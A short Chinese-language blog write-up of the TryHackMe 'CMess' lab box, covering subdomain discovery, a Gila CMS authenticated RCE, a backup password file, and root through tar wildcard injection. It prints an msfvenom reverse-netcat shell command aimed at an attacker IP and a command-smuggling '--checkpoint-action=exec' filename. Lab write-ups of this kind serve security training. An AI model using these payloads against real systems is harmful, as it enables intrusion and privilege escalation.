Post

[thm] CMess

[thm] CMess

information

alt text

port scan

alt text 通过子域名爆破发现一个子域名,得到用户邮箱和密码。web/[andre@cmess.thm:KPFTN_f2yxe%]

user1

在主域下发现cms框架为gila cms。搜索发现有一个nday,Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) 直接获得shell。 alt text

user2

alt text

cat /var/www/html/config.php

这里有一个数据库的账户,不知道为什么,这里我连不上去,直接看wp了,发现我的做法没有问题,但是这里是一个兔子洞。 正确的做法是在/opt下找到一个.password.bak文件 alt text 查看passwd发现这里的用户名也不对,使用正确的用户名登录。 alt text 得到user2 andre:UQfsdCB7aAP6

root

alt text 这里是一个通配符注入。 这里直接用bash反弹shell拿不到,使用msfvenom生成一个就可以成功弹回来了,生成语句如下: sudo msfvenom -p cmd/unix/reverse_netcat lhost=10.11.120.122 lport=1234 R > shell.sh

再一个就是生成文件夹的时候,使用mkdir不好生成带有--的文件,看了wp,发现可以使用echo方法,语句如下: echo "" > "--checkpoint-action=exec=sh shell.sh"

conclution

  • 基本信息收集要收集全面,在初期,广泛的信息收集大于漏洞的深究。
  • 小细节。
This post is licensed under CC BY 4.0 by the author.